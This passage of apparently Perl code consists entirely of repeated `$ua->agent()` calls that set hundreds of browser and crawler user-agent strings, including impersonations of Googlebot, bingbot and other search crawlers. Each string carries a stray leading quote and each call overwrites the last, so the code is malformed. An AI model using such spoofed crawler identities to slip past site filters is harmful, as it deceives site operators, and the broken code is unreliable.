  3885. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  3886. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  3887. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  3888. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  3889. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  3890. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  3891. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  3892. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3893. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  3894. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  3895. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  3896. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  3897. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  3898. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  3899. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3900. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3901. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  3902. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  3903. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  3904. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  3905. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  3906. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  3907. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3908. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  3909. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  3910. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  3911. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  3912. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  3913. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  3914. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  3915. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3916. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  3917. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  3918. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  3919. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  3920. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  3921. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  3922. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  3923. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  3924. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  3925. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  3926. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  3927. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  3928. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  3929. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  3930. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  3931. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  3932. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  3933. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  3934. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  3935. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  3936. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  3937. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  3938. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  3939. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  3940. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3941. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  3942. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  3943. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  3944. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  3945. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  3946. $ua->agent("'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620");
  3947. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com");
  3948. $ua->agent("'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)");
  3949. $ua->agent("'Mozilla/4.0 (compatible; Arachmo)");
  3950. $ua->agent("'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)");
  3951. $ua->agent("'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
  3952. $ua->agent("'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
  3953. $ua->agent("'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)");
  3954. $ua->agent("'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)");
  3955. $ua->agent("'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)");
  3956. $ua->agent("'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)");
  3957. $ua->agent("'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)");
  3958. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  3959. $ua->agent("'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )");
  3960. $ua->agent("'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )");
  3961. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  3962. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)");
  3963. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  3964. $ua->agent("'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)");
  3965. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)");
  3966. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)");
  3967. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)");
  3968. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  3969. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA");
  3970. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2");
  3971. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1");
  3972. $ua->agent("'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)");
  3973. $ua->agent("'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A");
  3974. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 3.55)");
  3975. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 2.00)");
  3976. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 1.00)");
  3977. $ua->agent("'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0");
  3978. $ua->agent("'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)");
  3979. $ua->agent("'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)");
  3980. $ua->agent("'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)");
  3981. $ua->agent("'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)");
  3982. $ua->agent("'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)");
  3983. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)");
  3984. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ");
  3985. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)");
  3986. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  3987. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)");
  3988. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  3989. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})");
  3990. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))");
  3991. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)");
  3992. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51");
  3993. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  3994. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)");
  3995. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)");
  3996. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8");
  3997. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)");
  3998. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  3999. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4000. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4001. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4002. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4003. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4004. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4005. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4006. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  4007. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4008. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  4009. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4010. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4011. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  4012. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4013. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  4014. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  4015. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4016. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4017. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  4018. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  4019. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  4020. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4021. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4022. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  4023. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  4024. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  4025. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  4026. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  4027. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  4028. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  4029. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4030. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  4031. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  4032. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  4033. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  4034. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  4035. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  4036. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  4037. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  4038. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  4039. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  4040. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  4041. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  4042. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  4043. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4044. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  4045. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4046. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  4047. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  4048. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  4049. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  4050. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  4051. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  4052. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  4053. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  4054. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  4055. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  4056. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  4057. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  4058. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)");
  4059. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  4060. $ua->agent("'Googlebot/2.1 (http://www.googlebot.com/bot.html)");
  4061. $ua->agent("'Opera/9.20 (Windows NT 6.0; U; en)");
  4062. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)");
  4063. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)");
  4064. $ua->agent("'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0");
  4065. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16");
  4066. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)");
  4067. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13");
  4068. $ua->agent("'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)");
  4069. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  4070. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)");
  4071. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)");
  4072. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)");
  4073. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8");
  4074. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7");
  4075. $ua->agent("'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
  4076. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  4077. $ua->agent("'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)");
  4078. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4079. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4080. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4081. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4082. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4083. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4084. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4085. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4086. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  4087. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4088. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  4089. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4090. $ua->agent("'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)");
